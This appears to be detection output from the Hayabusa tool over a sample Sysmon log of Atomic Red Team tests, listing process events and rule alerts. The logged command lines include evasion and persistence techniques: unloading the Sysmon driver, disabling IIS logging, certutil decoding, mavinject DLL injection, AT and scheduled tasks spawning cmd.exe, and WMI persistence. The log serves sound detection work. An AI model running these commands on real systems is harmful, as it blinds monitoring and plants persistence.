23:57:02.806 +09:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: 
""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.895 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:02.977 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.235 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.309 
+09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.309 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.961 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 
2019-07-19 23:57:03.974 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.210 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.270 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 
747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.294 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.333 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.361 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.412 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.600 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 
747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:04.643 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.715 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.758 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx 2019-07-19 23:57:14.944 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 
747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:14.991 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:15.776 +09:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,rules/sigma/process_creation/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.496 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:16.552 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:44.283 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.073 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.094 +09:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.207 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.422 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.459 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.608 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.640 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.828 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.849 +09:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:46.927 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.218 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:47.238 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | LID: 0x50951 | PID: 5348 | PGUID: 747F3D96-DA6B-5D31-0000-00102DD33E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.398 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3316 | PGUID: 747F3D96-DA6E-5D31-0000-0010D8F63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:50.453 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a Java | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a Java"" | LID: 0x50951 | PID: 1284 | PGUID: 747F3D96-DA6E-5D31-0000-001081F93E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.923 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 608 | PGUID: 747F3D96-DA70-5D31-0000-001007293F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:57:52.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a C:\Windows\system32\javacpl.cpl | Process: C:\Windows\System32\pcalua.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a C:\Windows\system32\javacpl.cpl"" | LID: 0x50951 | PID: 112 | PGUID: 747F3D96-DA70-5D31-0000-00100E2C3F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
